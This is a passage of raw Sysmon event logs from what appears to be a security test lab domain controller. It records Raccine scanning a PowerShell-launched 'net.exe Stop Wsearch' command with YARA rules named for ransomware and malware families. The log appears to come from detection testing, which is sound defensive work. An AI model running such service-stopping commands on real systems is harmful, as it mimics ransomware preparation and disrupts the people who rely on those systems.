ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257865Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.270{9DBE88B5-5874-61B2-B209-010000000E02}64486060C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-B109-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257859Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.258{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-B109-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257858Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.258{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-B109-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257857Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.259{9DBE88B5-5874-61B2-B109-010000000E02}7840C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257854Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.243{9DBE88B5-5874-61B2-B009-010000000E02}62644512C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-AF09-010000000E02}5300C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257848Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.231{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-AF09-010000000E02}5300C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257847Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.231{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-AF09-010000000E02}5300C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257846Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.231{9DBE88B5-5874-61B2-AF09-010000000E02}5300C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257843Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.216{9DBE88B5-5874-61B2-AE09-010000000E02}73844976C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-AD09-010000000E02}5484C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257837Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.204{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-AD09-010000000E02}5484C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257836Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.204{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-AD09-010000000E02}5484C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257835Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.205{9DBE88B5-5874-61B2-AD09-010000000E02}5484C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257831Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.188{9DBE88B5-5874-61B2-AC09-010000000E02}80004732C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-AB09-010000000E02}3096C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257825Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.175{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-AB09-010000000E02}3096C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257824Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.175{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-AB09-010000000E02}3096C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257823Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.176{9DBE88B5-5874-61B2-AB09-010000000E02}3096C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257820Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.160{9DBE88B5-5874-61B2-AA09-010000000E02}74806680C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-A909-010000000E02}5084C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257814Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.148{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-A909-010000000E02}5084C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257813Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.148{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-A909-010000000E02}5084C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257812Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.149{9DBE88B5-5874-61B2-A909-010000000E02}5084C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257809Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.134{9DBE88B5-5874-61B2-A809-010000000E02}81521640C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-A709-010000000E02}7568C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257802Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.121{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-A709-010000000E02}7568C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257801Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.120{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-A709-010000000E02}7568C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257800Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.121{9DBE88B5-5874-61B2-A709-010000000E02}7568C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257796Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.102{9DBE88B5-5874-61B2-A609-010000000E02}80281108C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-A509-010000000E02}7732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257790Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.090{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-A509-010000000E02}7732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257789Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.090{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-A509-010000000E02}7732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257788Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.090{9DBE88B5-5874-61B2-A509-010000000E02}7732C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257785Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.074{9DBE88B5-5874-61B2-A409-010000000E02}57323824C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-A309-010000000E02}7692C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257779Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.063{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-A309-010000000E02}7692C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257778Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.062{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-A309-010000000E02}7692C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257777Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.063{9DBE88B5-5874-61B2-A309-010000000E02}7692C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257774Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.047{9DBE88B5-5874-61B2-A209-010000000E02}51326580C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-A109-010000000E02}5368C:\Program 